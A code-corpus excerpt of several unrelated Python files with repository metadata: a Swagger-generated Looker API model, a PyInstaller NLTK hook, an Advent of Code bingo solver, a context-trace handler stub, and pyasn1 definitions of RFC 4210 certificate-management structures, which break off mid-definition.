2019-06-19T20:13:14.000Z
|
2020-10-13T21:13:47.000Z
|
lookerapi/models/dialect_info.py
|
meetup/lookerapi
|
4e4160dbe007eb65ac8f449bead0cdc06090b07b
|
[
"MIT"
] | 10
|
2018-10-10T20:45:00.000Z
|
2022-02-21T03:12:58.000Z
|
# coding: utf-8
"""
Looker API 3.0 Reference
### Authorization The Looker API uses Looker **API3** credentials for authorization and access control. Looker admins can create API3 credentials on Looker's **Admin/Users** page. Pass API3 credentials to the **/login** endpoint to obtain a temporary access_token. Include that access_token in the Authorization header of Looker API requests. For details, see [Looker API Authorization](https://looker.com/docs/r/api/authorization) ### Client SDKs The Looker API is a RESTful system that should be usable by any programming language capable of making HTTPS requests. Client SDKs for a variety of programming languages can be generated from the Looker API's Swagger JSON metadata to streamline use of the Looker API in your applications. A client SDK for Ruby is available as an example. For more information, see [Looker API Client SDKs](https://looker.com/docs/r/api/client_sdks) ### Try It Out! The 'api-docs' page served by the Looker instance includes 'Try It Out!' buttons for each API method. After logging in with API3 credentials, you can use the \"Try It Out!\" buttons to call the API directly from the documentation page to interactively explore API features and responses. ### Versioning Future releases of Looker will expand this API release-by-release to securely expose more and more of the core power of Looker to API client applications. API endpoints marked as \"beta\" may receive breaking changes without warning. Stable (non-beta) API endpoints should not receive breaking changes in future releases. For more information, see [Looker API Versioning](https://looker.com/docs/r/api/versioning)
OpenAPI spec version: 3.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class DialectInfo(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, name=None, label=None, label_for_database_equivalent=None, default_port=None, default_max_connections=None, supported_options=None, installed=None, can=None):
"""
DialectInfo - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'name': 'str',
'label': 'str',
'label_for_database_equivalent': 'str',
'default_port': 'str',
'default_max_connections': 'str',
'supported_options': 'DialectInfoOptions',
'installed': 'bool',
'can': 'dict(str, bool)'
}
self.attribute_map = {
'name': 'name',
'label': 'label',
'label_for_database_equivalent': 'label_for_database_equivalent',
'default_port': 'default_port',
'default_max_connections': 'default_max_connections',
'supported_options': 'supported_options',
'installed': 'installed',
'can': 'can'
}
self._name = name
self._label = label
self._label_for_database_equivalent = label_for_database_equivalent
self._default_port = default_port
self._default_max_connections = default_max_connections
self._supported_options = supported_options
self._installed = installed
self._can = can
@property
def name(self):
"""
Gets the name of this DialectInfo.
The name of the dialect
:return: The name of this DialectInfo.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this DialectInfo.
The name of the dialect
:param name: The name of this DialectInfo.
:type: str
"""
self._name = name
@property
def label(self):
"""
Gets the label of this DialectInfo.
The human-readable label of the connection
:return: The label of this DialectInfo.
:rtype: str
"""
return self._label
@label.setter
def label(self, label):
"""
Sets the label of this DialectInfo.
The human-readable label of the connection
:param label: The label of this DialectInfo.
:type: str
"""
self._label = label
@property
def label_for_database_equivalent(self):
"""
Gets the label_for_database_equivalent of this DialectInfo.
What the dialect calls the equivalent of a normal SQL table
:return: The label_for_database_equivalent of this DialectInfo.
:rtype: str
"""
return self._label_for_database_equivalent
@label_for_database_equivalent.setter
def label_for_database_equivalent(self, label_for_database_equivalent):
"""
Sets the label_for_database_equivalent of this DialectInfo.
What the dialect calls the equivalent of a normal SQL table
:param label_for_database_equivalent: The label_for_database_equivalent of this DialectInfo.
:type: str
"""
self._label_for_database_equivalent = label_for_database_equivalent
@property
def default_port(self):
"""
Gets the default_port of this DialectInfo.
Default port number
:return: The default_port of this DialectInfo.
:rtype: str
"""
return self._default_port
@default_port.setter
def default_port(self, default_port):
"""
Sets the default_port of this DialectInfo.
Default port number
:param default_port: The default_port of this DialectInfo.
:type: str
"""
self._default_port = default_port
@property
def default_max_connections(self):
"""
Gets the default_max_connections of this DialectInfo.
Default number max connections
:return: The default_max_connections of this DialectInfo.
:rtype: str
"""
return self._default_max_connections
@default_max_connections.setter
def default_max_connections(self, default_max_connections):
"""
Sets the default_max_connections of this DialectInfo.
Default number max connections
:param default_max_connections: The default_max_connections of this DialectInfo.
:type: str
"""
self._default_max_connections = default_max_connections
@property
def supported_options(self):
"""
Gets the supported_options of this DialectInfo.
Option support details
:return: The supported_options of this DialectInfo.
:rtype: DialectInfoOptions
"""
return self._supported_options
@supported_options.setter
def supported_options(self, supported_options):
"""
Sets the supported_options of this DialectInfo.
Option support details
:param supported_options: The supported_options of this DialectInfo.
:type: DialectInfoOptions
"""
self._supported_options = supported_options
@property
def installed(self):
"""
Gets the installed of this DialectInfo.
Is the supporting driver installed
:return: The installed of this DialectInfo.
:rtype: bool
"""
return self._installed
@installed.setter
def installed(self, installed):
"""
Sets the installed of this DialectInfo.
Is the supporting driver installed
:param installed: The installed of this DialectInfo.
:type: bool
"""
self._installed = installed
@property
def can(self):
"""
Gets the can of this DialectInfo.
Operations the current user is able to perform on this object
:return: The can of this DialectInfo.
:rtype: dict(str, bool)
"""
return self._can
@can.setter
def can(self, can):
"""
Sets the can of this DialectInfo.
Operations the current user is able to perform on this object
:param can: The can of this DialectInfo.
:type: dict(str, bool)
"""
self._can = can
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, DialectInfo):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 33.163333
| 1,625
| 0.625691
|
53cf978cb7e5f7e8399767ed86407565f9b1c692
| 797
|
py
|
Python
|
hooks/hook-nltk.py
|
moevm/nosql1h19-text-graph
|
410f156ad4f232f8aa060d43692ab020610ddfd4
|
[
"MIT"
] | null | null | null |
hooks/hook-nltk.py
|
moevm/nosql1h19-text-graph
|
410f156ad4f232f8aa060d43692ab020610ddfd4
|
[
"MIT"
] | null | null | null |
hooks/hook-nltk.py
|
moevm/nosql1h19-text-graph
|
410f156ad4f232f8aa060d43692ab020610ddfd4
|
[
"MIT"
] | null | null | null |
#-----------------------------------------------------------------------------
# Copyright (c) 2005-2018, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License with exception
# for distributing bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#-----------------------------------------------------------------------------
# hook for nltk
import nltk
import os
from PyInstaller.utils.hooks import collect_data_files
# add datas for nltk
datas = collect_data_files('nltk', False)
# loop through the data directories and add them
for p in nltk.data.path:
if os.path.exists(p):
datas.append((p, "nltk_data"))
# nltk.chunk.named_entity should be included
hiddenimports = ["nltk.chunk.named_entity"]
| 30.653846
| 78
| 0.608532
|
fb5087e2f5125f07a505f937d41644613b158308
| 1,965
|
py
|
Python
|
day4/d4p1.py
|
flowgrow/adventofcode2021
|
b6e316a388726031ff500ce77d1ec5d5b7da0658
|
[
"MIT"
] | null | null | null |
day4/d4p1.py
|
flowgrow/adventofcode2021
|
b6e316a388726031ff500ce77d1ec5d5b7da0658
|
[
"MIT"
] | null | null | null |
day4/d4p1.py
|
flowgrow/adventofcode2021
|
b6e316a388726031ff500ce77d1ec5d5b7da0658
|
[
"MIT"
] | null | null | null |
draws = []
boards = []
markings = []
def find_number(matrix, number):
for r in range(5):
for c in range(5):
if matrix[r][c] is number:
return (True, r, c)
return (False, -1, -1)
def find_bingo(marking, board):
for r, row in enumerate(marking):
if sum(row) == 5:
return True
transposed = list(map(list, zip(*marking)))
for c, col in enumerate(transposed):
if sum(col) == 5:
return True
return False
def sum_unmarked(marking, board):
sum = 0
for r in range(5):
for c in range(5):
if marking[r][c] == 0:
sum += board[r][c]
return sum
def sum_marked(marking, board):
sum = 0
for r in range(5):
for c in range(5):
if marking[r][c] == 1:
sum += board[r][c]
return sum
def read_data():
global draws
global boards
global markings
input = open('input.txt', 'r')
draws = input.readline().strip()
draws = [int(x) for x in draws.split(',')]
lines = input.readlines()
row = 0
for line in lines:
line = line.strip()
if len(line) == 0:
boards.append([None] * 5)
markings.append([None] * 5)
row = 0
else:
numbers = [int(x) for x in line.split()]
boards[-1][row] = numbers
markings[-1][row] = [0, 0, 0, 0, 0]
row += 1
def play_game():
for i, number in enumerate(draws):
for j, board in enumerate(boards):
marking = markings[j]
found, r, c = find_number(board, number)
if found:
marking[r][c] = 1
if i >= 5:
bingo = find_bingo(marking, board)
if bingo:
return sum_unmarked(marking, board), number
return 0, 0
read_data()
sum, number = play_game()
print(sum, number, sum * number)
| 23.674699
| 67
| 0.499237
|
e783cf60d79f7ebed1128430f6892b74fae05a74
| 3,262
|
py
|
Python
|
contextmonkey/tracelayer/handlers/model/ModelRequestHandler.py
|
manojrege/contextmonkey
|
9974889a726d7f60c6da0d6ccab97113ce635a14
|
[
"BSD-3-Clause"
] | 4
|
2017-03-17T02:28:12.000Z
|
2019-04-18T11:25:44.000Z
|
contextmonkey/tracelayer/handlers/model/ModelRequestHandler.py
|
manojrege/contextmonkey
|
9974889a726d7f60c6da0d6ccab97113ce635a14
|
[
"BSD-3-Clause"
] | null | null | null |
contextmonkey/tracelayer/handlers/model/ModelRequestHandler.py
|
manojrege/contextmonkey
|
9974889a726d7f60c6da0d6ccab97113ce635a14
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2017, Technische Universität Berlin
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# - Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# - Neither the name of the Technische Universitaet Berlin nor the names
# of its contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
# TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Model trace fetching request handler."""
__author__ = "Manoj R. Rege"
__copyright__ = "Copyright (c) 2017, Technische Universität Berlin"
__credits__ = ["Manoj R. Rege"]
__version__ = "1.0"
__maintainer__ = "Manoj R. Rege"
__email__ = "rege@tkn.tu-berlin.de"
__status__ = "Prototype"
import sys
import os
sys.path.append(os.path.dirname(__file__) + '/../../../' )
import linecache
import random
import requests
from subprocess import call
from collections import namedtuple
from twisted.internet import reactor
from twisted.web.client import downloadPage
from twisted.python.util import println
from twisted.internet.ssl import ClientContextFactory
from twisted.internet import ssl
from contextmonkey.tracelayer.handlers.file.ContextMonkeyFileCache import TEXTFileCache
from contextmonkey.tracelayer.handlers.file.ContextMonkeyFileCache import CSVFileCache
from contextmonkey.tracelayer.handlers.file.ContextMonkeyFileCache import YAMLFileCache
from contextmonkey.tracelayer.handlers.file.ContextMonkeyFileCache import JSONFileCache
from contextmonkey.tracelayer.handlers.file.ContextMonkeyFileCache import XMLFileCache
class ModelRequestHandler(object):
"""Base class to handle trace fetching request from a model."""
def __init__(self,**kwargs):
"""Initialize model handler."""
pass
def failure(self, reason):
"""Handle trace fetching failure."""
pass
def executeFetch(self, **kwargs):
"""Read trace from a trace file in the cache."""
pass
def generateScenario(self, **kwargs):
"""Generate trace file from a given scenario using the command."""
pass
| 41.291139
| 87
| 0.770999
|
167cfbbcbe47cc2d4e0286fbe3964defdde43202
| 170
|
py
|
Python
|
src/cross_validation/__init__.py
|
ychnlgy/Chebyshev-Lagrange
|
74292e72b83f992d6c42a2f2db04dfdce5a52aea
|
[
"MIT"
] | 1
|
2021-08-19T14:28:45.000Z
|
2021-08-19T14:28:45.000Z
|
src/cross_validation/__init__.py
|
ychnlgy/Chebyshev-Lagrange
|
74292e72b83f992d6c42a2f2db04dfdce5a52aea
|
[
"MIT"
] | null | null | null |
src/cross_validation/__init__.py
|
ychnlgy/Chebyshev-Lagrange
|
74292e72b83f992d6c42a2f2db04dfdce5a52aea
|
[
"MIT"
] | 1
|
2022-03-11T07:20:06.000Z
|
2022-03-11T07:20:06.000Z
|
from . import replace_nan
from .leave_one_out import leave_one_out, iter_leaveone, partition_by_uid
from .k_fold import k_fold
from .standard_scale import standard_scale
| 34
| 73
| 0.858824
|
545e9f42fbdc0123124a1148031c80a17b243223
| 26,208
|
py
|
Python
|
lib/pyasn1_modules/rfc4210.py
|
nirzari18/Query-Analysis-Application-on-Google-App-Engine
|
0b767c27b2ec173ce2fe2cbb39cbf71115eb4aba
|
[
"Apache-2.0"
] | 2,151
|
2020-04-18T07:31:17.000Z
|
2022-03-31T08:39:18.000Z
|
lib/pyasn1_modules/rfc4210.py
|
nirzari18/Query-Analysis-Application-on-Google-App-Engine
|
0b767c27b2ec173ce2fe2cbb39cbf71115eb4aba
|
[
"Apache-2.0"
] | 395
|
2020-04-18T08:22:18.000Z
|
2021-12-08T13:04:49.000Z
|
lib/pyasn1_modules/rfc4210.py
|
nirzari18/Query-Analysis-Application-on-Google-App-Engine
|
0b767c27b2ec173ce2fe2cbb39cbf71115eb4aba
|
[
"Apache-2.0"
] | 338
|
2020-04-18T08:03:10.000Z
|
2022-03-29T12:33:22.000Z
|
#
# Certificate Management Protocol structures as per RFC4210
#
# Based on Alex Railean's work
#
from pyasn1.type import tag,namedtype,namedval,univ,constraint,char,useful
from pyasn1_modules import rfc2459, rfc2511, rfc2314
MAX = 64
class KeyIdentifier(univ.OctetString): pass
class CMPCertificate(rfc2459.Certificate): pass
class OOBCert(CMPCertificate): pass
class CertAnnContent(CMPCertificate): pass
class PKIFreeText(univ.SequenceOf):
"""
PKIFreeText ::= SEQUENCE SIZE (1..MAX) OF UTF8String
"""
componentType = char.UTF8String()
subtypeSpec = univ.SequenceOf.subtypeSpec + constraint.ValueSizeConstraint(1, MAX)
class PollRepContent(univ.SequenceOf):
"""
PollRepContent ::= SEQUENCE OF SEQUENCE {
certReqId INTEGER,
checkAfter INTEGER, -- time in seconds
reason PKIFreeText OPTIONAL
}
"""
class CertReq(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('certReqId', univ.Integer()),
namedtype.NamedType('checkAfter', univ.Integer()),
namedtype.OptionalNamedType('reason', PKIFreeText())
)
componentType = CertReq()
class PollReqContent(univ.SequenceOf):
"""
PollReqContent ::= SEQUENCE OF SEQUENCE {
certReqId INTEGER
}
"""
class CertReq(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('certReqId', univ.Integer())
)
componentType = CertReq()
class InfoTypeAndValue(univ.Sequence):
"""
InfoTypeAndValue ::= SEQUENCE {
infoType OBJECT IDENTIFIER,
infoValue ANY DEFINED BY infoType OPTIONAL
}"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('infoType', univ.ObjectIdentifier()),
namedtype.OptionalNamedType('infoValue', univ.Any())
)
class GenRepContent(univ.SequenceOf):
componentType = InfoTypeAndValue()
class GenMsgContent(univ.SequenceOf):
componentType = InfoTypeAndValue()
class PKIConfirmContent(univ.Null): pass
class CRLAnnContent(univ.SequenceOf):
componentType = rfc2459.CertificateList()
class CAKeyUpdAnnContent(univ.Sequence):
"""
CAKeyUpdAnnContent ::= SEQUENCE {
oldWithNew CMPCertificate,
newWithOld CMPCertificate,
newWithNew CMPCertificate
}
"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('oldWithNew', CMPCertificate()),
namedtype.NamedType('newWithOld', CMPCertificate()),
namedtype.NamedType('newWithNew', CMPCertificate())
)
class RevDetails(univ.Sequence):
"""
RevDetails ::= SEQUENCE {
certDetails CertTemplate,
crlEntryDetails Extensions OPTIONAL
}
"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('certDetails', rfc2511.CertTemplate()),
namedtype.OptionalNamedType('crlEntryDetails', rfc2459.Extensions())
)
class RevReqContent(univ.SequenceOf):
componentType = RevDetails()
class CertOrEncCert(univ.Choice):
"""
CertOrEncCert ::= CHOICE {
certificate [0] CMPCertificate,
encryptedCert [1] EncryptedValue
}
"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('certificate', CMPCertificate().subtype(
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0)
)
),
namedtype.NamedType('encryptedCert', rfc2511.EncryptedValue().subtype(
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 1)
)
)
)
class CertifiedKeyPair(univ.Sequence):
"""
CertifiedKeyPair ::= SEQUENCE {
certOrEncCert CertOrEncCert,
privateKey [0] EncryptedValue OPTIONAL,
publicationInfo [1] PKIPublicationInfo OPTIONAL
}
"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('certOrEncCert', CertOrEncCert()),
namedtype.OptionalNamedType('privateKey', rfc2511.EncryptedValue().subtype(
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0)
)
),
namedtype.OptionalNamedType('publicationInfo', rfc2511.PKIPublicationInfo().subtype(
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 1)
)
)
)
class POPODecKeyRespContent(univ.SequenceOf):
componentType = univ.Integer()
class Challenge(univ.Sequence):
"""
Challenge ::= SEQUENCE {
owf AlgorithmIdentifier OPTIONAL,
witness OCTET STRING,
challenge OCTET STRING
}
"""
componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('owf', rfc2459.AlgorithmIdentifier()),
namedtype.NamedType('witness', univ.OctetString()),
namedtype.NamedType('challenge', univ.OctetString())
)
class PKIStatus(univ.Integer):
"""
PKIStatus ::= INTEGER {
accepted (0),
grantedWithMods (1),
rejection (2),
waiting (3),
revocationWarning (4),
revocationNotification (5),
keyUpdateWarning (6)
}
"""
namedValues = namedval.NamedValues(
('accepted', 0),
('grantedWithMods', 1),
('rejection', 2),
('waiting', 3),
('revocationWarning', 4),
('revocationNotification', 5),
('keyUpdateWarning', 6)
)
class PKIFailureInfo(univ.BitString):
"""
PKIFailureInfo ::= BIT STRING {
badAlg (0),
badMessageCheck (1),
badRequest (2),
badTime (3),
badCertId (4),
badDataFormat (5),
wrongAuthority (6),
incorrectData (7),
missingTimeStamp (8),
badPOP (9),
certRevoked (10),
certConfirmed (11),
wrongIntegrity (12),
badRecipientNonce (13),
timeNotAvailable (14),
unacceptedPolicy (15),
unacceptedExtension (16),
addInfoNotAvailable (17),
badSenderNonce (18),
badCertTemplate (19),
signerNotTrusted (20),
transactionIdInUse (21),
unsupportedVersion (22),
notAuthorized (23),
systemUnavail (24),
systemFailure (25),
duplicateCertReq (26)
"""
namedValues = namedval.NamedValues(
('badAlg', 0),
('badMessageCheck', 1),
('badRequest', 2),
('badTime', 3),
('badCertId', 4),
('badDataFormat', 5),
('wrongAuthority', 6),
('incorrectData', 7),
('missingTimeStamp', 8),
('badPOP', 9),
('certRevoked', 10),
('certConfirmed', 11),
('wrongIntegrity', 12),
('badRecipientNonce', 13),
('timeNotAvailable', 14),
('unacceptedPolicy', 15),
('unacceptedExtension', 16),
('addInfoNotAvailable', 17),
('badSenderNonce', 18),
('badCertTemplate', 19),
('signerNotTrusted', 20),
('transactionIdInUse', 21),
('unsupportedVersion', 22),
('notAuthorized', 23),
('systemUnavail', 24),
('systemFailure', 25),
('duplicateCertReq', 26)
)
class PKIStatusInfo(univ.Sequence):
"""
PKIStatusInfo ::= SEQUENCE {
status PKIStatus,
statusString PKIFreeText OPTIONAL,
failInfo PKIFailureInfo OPTIONAL
}
"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('status', PKIStatus()),
namedtype.OptionalNamedType('statusString', PKIFreeText()),
namedtype.OptionalNamedType('failInfo', PKIFailureInfo())
)
class ErrorMsgContent(univ.Sequence):
"""
ErrorMsgContent ::= SEQUENCE {
pKIStatusInfo PKIStatusInfo,
errorCode INTEGER OPTIONAL,
-- implementation-specific error codes
errorDetails PKIFreeText OPTIONAL
-- implementation-specific error details
}
"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('pKIStatusInfo', PKIStatusInfo()),
namedtype.OptionalNamedType('errorCode', univ.Integer()),
namedtype.OptionalNamedType('errorDetails', PKIFreeText())
)
class CertStatus(univ.Sequence):
"""
CertStatus ::= SEQUENCE {
certHash OCTET STRING,
certReqId INTEGER,
statusInfo PKIStatusInfo OPTIONAL
}
"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('certHash', univ.OctetString()),
namedtype.NamedType('certReqId', univ.Integer()),
namedtype.OptionalNamedType('statusInfo', PKIStatusInfo())
)
class CertConfirmContent(univ.SequenceOf):
componentType = CertStatus()
class RevAnnContent(univ.Sequence):
"""
RevAnnContent ::= SEQUENCE {
status PKIStatus,
certId CertId,
willBeRevokedAt GeneralizedTime,
badSinceDate GeneralizedTime,
crlDetails Extensions OPTIONAL
}
"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('status', PKIStatus()),
namedtype.NamedType('certId', rfc2511.CertId()),
namedtype.NamedType('willBeRevokedAt', useful.GeneralizedTime()),
namedtype.NamedType('badSinceDate', useful.GeneralizedTime()),
namedtype.OptionalNamedType('crlDetails', rfc2459.Extensions())
)
class RevRepContent(univ.Sequence):
"""
RevRepContent ::= SEQUENCE {
status SEQUENCE SIZE (1..MAX) OF PKIStatusInfo,
revCerts [0] SEQUENCE SIZE (1..MAX) OF CertId
OPTIONAL,
crls [1] SEQUENCE SIZE (1..MAX) OF CertificateList
OPTIONAL
"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('status', PKIStatusInfo()),
namedtype.OptionalNamedType('revCerts', univ.SequenceOf(
componentType=rfc2511.CertId()
).subtype(
subtypeSpec=constraint.ValueSizeConstraint(1, MAX),
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0)
)
),
namedtype.OptionalNamedType('crls', univ.SequenceOf(
componentType=rfc2459.CertificateList()
).subtype(
subtypeSpec=constraint.ValueSizeConstraint(1, MAX),
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 1)
)
)
)
class KeyRecRepContent(univ.Sequence):
"""
KeyRecRepContent ::= SEQUENCE {
status PKIStatusInfo,
newSigCert [0] CMPCertificate OPTIONAL,
caCerts [1] SEQUENCE SIZE (1..MAX) OF
CMPCertificate OPTIONAL,
keyPairHist [2] SEQUENCE SIZE (1..MAX) OF
CertifiedKeyPair OPTIONAL
}
"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('status', PKIStatusInfo()),
namedtype.OptionalNamedType('newSigCert', CMPCertificate().subtype(
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0)
)
),
namedtype.OptionalNamedType('caCerts', univ.SequenceOf(
componentType=CMPCertificate()
).subtype(
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 1),
subtypeSpec=constraint.ValueSizeConstraint(1, MAX)
)
),
namedtype.OptionalNamedType('keyPairHist', univ.SequenceOf(
componentType=CertifiedKeyPair()
).subtype(
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 2),
subtypeSpec=constraint.ValueSizeConstraint(1, MAX)
)
)
)
class CertResponse(univ.Sequence):
"""
CertResponse ::= SEQUENCE {
certReqId INTEGER,
status PKIStatusInfo,
certifiedKeyPair CertifiedKeyPair OPTIONAL,
rspInfo OCTET STRING OPTIONAL
}
"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('certReqId', univ.Integer()),
namedtype.NamedType('status', PKIStatusInfo()),
namedtype.OptionalNamedType('certifiedKeyPair', CertifiedKeyPair()),
namedtype.OptionalNamedType('rspInfo', univ.OctetString())
)
class CertRepMessage(univ.Sequence):
"""
CertRepMessage ::= SEQUENCE {
caPubs [1] SEQUENCE SIZE (1..MAX) OF CMPCertificate
OPTIONAL,
response SEQUENCE OF CertResponse
}
"""
componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('caPubs', univ.SequenceOf(
componentType=CMPCertificate()
).subtype(
subtypeSpec=constraint.ValueSizeConstraint(1, MAX),
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,1)
)
),
namedtype.NamedType('response', univ.SequenceOf(
componentType=CertResponse())
)
)
class POPODecKeyChallContent(univ.SequenceOf):
componentType = Challenge()
class OOBCertHash(univ.Sequence):
"""
OOBCertHash ::= SEQUENCE {
hashAlg [0] AlgorithmIdentifier OPTIONAL,
certId [1] CertId OPTIONAL,
hashVal BIT STRING
}
"""
componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('hashAlg',
rfc2459.AlgorithmIdentifier().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,0)
)
),
namedtype.OptionalNamedType('certId', rfc2511.CertId().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,1)
)
),
namedtype.NamedType('hashVal', univ.BitString())
)
# pyasn1 does not naturally handle recursive definitions, thus this hack:
# NestedMessageContent ::= PKIMessages
class NestedMessageContent(univ.SequenceOf):
"""
NestedMessageContent ::= PKIMessages
"""
componentType = univ.Any()
class DHBMParameter(univ.Sequence):
"""
DHBMParameter ::= SEQUENCE {
owf AlgorithmIdentifier,
-- AlgId for a One-Way Function (SHA-1 recommended)
mac AlgorithmIdentifier
-- the MAC AlgId (e.g., DES-MAC, Triple-DES-MAC [PKCS11],
} -- or HMAC [RFC2104, RFC2202])
"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('owf', rfc2459.AlgorithmIdentifier()),
namedtype.NamedType('mac', rfc2459.AlgorithmIdentifier())
)
id_DHBasedMac = univ.ObjectIdentifier('1.2.840.113533.7.66.30')
class PBMParameter(univ.Sequence):
"""
PBMParameter ::= SEQUENCE {
salt OCTET STRING,
owf AlgorithmIdentifier,
iterationCount INTEGER,
mac AlgorithmIdentifier
}
"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('salt', univ.OctetString().subtype(
subtypeSpec=constraint.ValueSizeConstraint(0, 128)
)
),
namedtype.NamedType('owf', rfc2459.AlgorithmIdentifier()),
namedtype.NamedType('iterationCount', univ.Integer()),
namedtype.NamedType('mac', rfc2459.AlgorithmIdentifier())
)
id_PasswordBasedMac = univ.ObjectIdentifier('1.2.840.113533.7.66.13')
class PKIProtection(univ.BitString): pass
# pyasn1 does not naturally handle recursive definitions, thus this hack:
# NestedMessageContent ::= PKIMessages
nestedMessageContent = NestedMessageContent().subtype(explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,20))
class PKIBody(univ.Choice):
"""
PKIBody ::= CHOICE { -- message-specific body elements
ir [0] CertReqMessages, --Initialization Request
ip [1] CertRepMessage, --Initialization Response
cr [2] CertReqMessages, --Certification Request
cp [3] CertRepMessage, --Certification Response
p10cr [4] CertificationRequest, --imported from [PKCS10]
popdecc [5] POPODecKeyChallContent, --pop Challenge
popdecr [6] POPODecKeyRespContent, --pop Response
kur [7] CertReqMessages, --Key Update Request
kup [8] CertRepMessage, --Key Update Response
krr [9] CertReqMessages, --Key Recovery Request
krp [10] KeyRecRepContent, --Key Recovery Response
rr [11] RevReqContent, --Revocation Request
rp [12] RevRepContent, --Revocation Response
ccr [13] CertReqMessages, --Cross-Cert. Request
ccp [14] CertRepMessage, --Cross-Cert. Response
ckuann [15] CAKeyUpdAnnContent, --CA Key Update Ann.
cann [16] CertAnnContent, --Certificate Ann.
rann [17] RevAnnContent, --Revocation Ann.
crlann [18] CRLAnnContent, --CRL Announcement
pkiconf [19] PKIConfirmContent, --Confirmation
nested [20] NestedMessageContent, --Nested Message
genm [21] GenMsgContent, --General Message
"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('ir', rfc2511.CertReqMessages().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,0)
)
),
namedtype.NamedType('ip', CertRepMessage().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,1)
)
),
namedtype.NamedType('cr', rfc2511.CertReqMessages().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,2)
)
),
namedtype.NamedType('cp', CertRepMessage().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,3)
)
),
namedtype.NamedType('p10cr', rfc2314.CertificationRequest().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,4)
)
),
namedtype.NamedType('popdecc', POPODecKeyChallContent().subtype(
